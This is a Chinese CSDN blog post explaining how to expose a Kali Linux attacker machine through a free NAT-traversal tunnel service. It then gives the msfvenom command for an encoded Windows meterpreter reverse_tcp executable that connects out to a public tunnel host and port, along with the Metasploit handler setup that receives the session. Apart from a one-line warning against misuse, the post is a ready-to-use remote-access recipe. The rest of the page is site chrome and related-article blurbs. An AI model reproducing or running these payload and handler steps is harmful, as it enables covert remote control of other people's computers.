MSF和内网穿透

子虚乌有x

已于 2023-04-11 16:20:35 修改

阅读量249

点赞数 4

文章标签：安全网络安全系统安全 linux windows

于 2023-04-11 15:01:52 首次发布

本文链接：https://blog.csdn.net/qq_47077502/article/details/130082894

版权

切记！不要去干坏事！

首先我们需要一个内网穿透的工具，我这里用的是飞鸽，注册登录之后选择开通隧道，然后随便选个节点，然后点免费使用

然后我们选择tcp协议，端口号可以随便提填，ip去虚拟机里找

然后把ip填进去

我这里之前创建了一个，不能再创建免费节点，所以就直接放创建好的图了

然后我们下载客户端，把他放进kali linux里，安装方法飞鸽教程里有写，我就直接拿过来了。

运行成功的效果应该是这个样子

紧接着就是熟悉的生成指令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=freehk.svipss.top lport=20422 -f exe > shell.exe
lhost为访问地址冒号前的部分
lport为访问地址冒号后的部分
相当于一个是ip，一个是端口号

生成成功，紧接着我们打开msf工具，我比较懒，就直接搜索了

然后寻找这段关键字，这里可能你的序号跟我不一样，自己找一下啦

现在我们使用关键字use，use 30，然后开始设置模块

set payload windows/meterpreter/reverse_tcp

设置一下lhost和lport，这里的两个值就填我们飞鸽里面写的信息

弄好之后直接run，然后等电脑访问

如果成功的话，就会出现下面一样的提示

截图看一下

没问题了

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

子虚乌有x

关注关注

4
点赞
踩
2

收藏

觉得还不错? 一键收藏
3
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

内网MSF11111

01-05

内网渗透测试中，Metasploit（MSF）是一个常用的安全工具，用于模拟攻击和漏洞利用。本文将详细讲解如何在内网环境中配置MSF，包括PostgreSQL数据库的安装、管理以及MSF数据库的设置。首先，安装PostgreSQL数据库...

搭建内网靶场并用MSF进行内网穿透/渗透实验

Cwillchris的博客

10-17

4058

实验名称：利用MSF打穿内网实验人：XX 实验日期：2021.10.16 实验目的：利用MSF进行内网渗透实验拓扑：实验环境：所用机器网络类型 IP 默认网关 DNS 攻击机：kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114

3 条评论您还未登录，请先登录后发表或查看评论

frp内网穿透教程2023最新（含内网ssh配置与msf联动配置）

qq1140037586的博客

08-31

3594

frp是一个高性能的反向代理应用，可以帮助您轻松地进行内网穿透，对外网提供服务，支持tcp, udp, http,https等协议类型，并且web服务支持根据域名进行路由转发。

Bt5+msf+ettercap内网渗透

01-20

kali linux 内网渗透视频教程，详细的操作过程和原理。

msf内网渗透

10-29

在IT安全领域，尤其是渗透测试和网络攻防中，“msf内网渗透”是一个关键话题，涉及到了Metasploit框架（简称MSF）在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...

第二十四课：基于MSF发现内网存活主机第二季.docx

09-15

本课程聚焦于如何利用MSF发现内网中的存活主机，这是渗透测试中至关重要的一步，有助于识别潜在的目标和安全漏洞。以下是基于MSF进行内网主机发现的第二季课程内容详解。首先，我们要理解在第一季中介绍的五个扫描...

项目管理利刃之MSF

03-03

火龙果软件工程技术中心 MSF，MicrosoftSolutionFramework，微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。...MSF指导由原理、模型和用来管理人员、项目和技术元素的准则

时间&安全精细化管理平台存在未授权访问漏洞

2301_77012231的博客

09-14

188

网站安全需求分析与安全保护工程

weixin_49171105的博客

09-09

828

网站：是基于B/S技术架构的综合信息服务平台，主要提供网页信息及业务后台对外接口服务。

注册安全分析报告：熊猫频道

Explinks的博客

09-10

625

熊猫频道作为央视的子频道，采用的还是老一代的图形验证码已经落伍了，用户体验一般，容易被破解，一旦被国际黑客发起攻击，将会对老百姓形成骚扰，影响声誉。很多人在短信服务刚开始建设的阶段，可能不会在安全方面考虑太多，理由有很多。比如：“需求这么赶，当然是先实现功能啊”，“业务量很小啦，系统就这么点人用，不怕的” ， “我们怎么会被盯上呢，不可能的”等等。有一些理由虽然有道理，但是该来的总是会来的。前期欠下来的债，总是要还的。越早还，问题就越小，损失就越低。

SSHamble：一款针对SSH技术安全的研究与分析工具

FreeBuf_的博客

09-11

974

SSHamble是一款功能强大的SSH技术安全分析与研究工具，该工具基于Go语言开发，可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。

3.比 HTTP 更安全的 HTTPS（工作原理理解、非对称加密理解、证书理解）

weixin_52173250的博客

09-07

1573

HTTPS（Hypertext Transfer Protocol Secure）是一种安全的超文本传输协议，主要用于在客户端和服务器之间安全地传输数据

Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计

最新发布

哦卷！

09-14

412

我发现很多文章包括教程，大概套路是：只说有漏洞的点，将有漏洞的点指出，然后分析代码；或者黑盒测试出漏洞之后，然后分析代码。我认为这是在分析漏洞代码，而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在，包括思路！所以这里不管有没有漏洞，我都会把审计过程写出来，因此篇幅会很长，但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。

远程跨境传输大文件如何做到安全又稳定？

镭速的博客

09-14

313

在当今全球化的商业环境中，企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移，还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题，以及在传输过程中应注意的事项，并重点介绍镭速在方面的优势。

构建常态化安全防线：XDR的态势感知与自动化响应机制

安胜ANSCEN的博客

09-11

881

一款基于XDR理念的一站式安全运营平台，由长年实战对抗中形成的攻防知识经验指导设计，结合大数据、大模型与安全编排自动化响应技术，提供全局监测预警、自动化研判、智能响应、联防联控等能力，体系化提升全局态势感知和主动防御能力，规范化安全运营协同管理工作。星盾作为企业网络安全体系的安全大脑通过汇聚传统安全设备的数据，形成覆盖云、网、边、端全维度的神经元体系，实现跨边界、跨区域、跨设备的全方位安全检测和响应，为全局的安全态势感知、风险评估、资产台账管理、上下联动与协同等安全运营工作提供一站式解决方案。

企业如何构建有效的数据泄露防护安全体系

A526847的博客

09-14

300

在当今数字化时代，企业数据已成为核心资产，其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发，不仅会导致经济损失，还可能损害企业声誉和客户关系。因此，构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。

信刻光盘安全隔离与信息交换系统

cdprinter的博客

09-11

277

信刻按需研制的光盘安全隔离与信息交换系统，应用不同等级网络之间进行可靠、高效的安全数据交换，实现A网-B网，B网-A网双向摆渡。集数据自动摆渡、用户管理、日志管理、加密及杀毒、数据检查与过滤、校验、安全审计等功能于一体。

使用Let’s Encrypt 配置 SSL 证书去除浏览器不安全告警

舒一笑的博客

09-14

执行完上述命令之后会提示你输入一下自己的邮箱信息等等然后会给你两个TXT的值类型，需要将这两个值配置在你自己的云服务DNS解析中，我这里以阿里云DNS为例。配置解析值时候需要注意自己购买的云厂商的解析规则，例如这里阿里云DNS是默认会带上你的一级域名，因此在书写配置时候就不用写了。经过我的验证这边虽然是免费的ssl认证给你白嫖三个月，但是如果你上述解析配置正确的话还是认证发证书很快的。然后后续的话需要在nginx中配置自己的一下证书信息，下面展示一下我的nginx配置。使用命令查看一下证书文件是否存在。

38900 机动车安全检测

长安不及十里的博客

09-14

613

2、三轴及三轴以上的货车，对部分轴（最后一轴及货车第一轴除外）还应测试加载轴制动率和加载轴制动不平衡率。2、三轴及三轴以上的货车，对部分轴（最后一轴及货车第一轴除外）还应测试加载轴制动率和加载轴制动不平衡率﹔采用空气悬架的车辆、总质量为整备质量1.2倍以下的车辆不测试加载轴制动率和加载轴制动不平衡率。**备注：**外廓尺寸、核定载人数和座椅布置和整备质量项目仅适用于带驾驶室的正三轮摩托车以及不带驾驶室、不具有载运货物结构或功能且设计和制造上最多乘坐2人(包括驾驶人)的正三轮摩托车。

msf和frp内网穿透

08-19

msf和frp都是常用于内网穿透的工具，可以帮助远程访问和控制内网中的设备。 Metasploit Framework（简称msf）是一个开源的渗透测试框架，它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用，但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台，从而实现对内网设备的访问。 Frp是一个高性能的反向代理工具，可以帮助将内网服务暴露到公网中，实现内网穿透。通过在内网中启动Frp客户端，并在公网服务器上启动Frp服务器端，你可以将内网中的服务映射到公网IP上，从而实现对内网设备的远程访问。总之，无论你选择使用msf还是frp，都可以帮助你实现内网穿透，让你可以方便地远程访问和控制内网中的设备。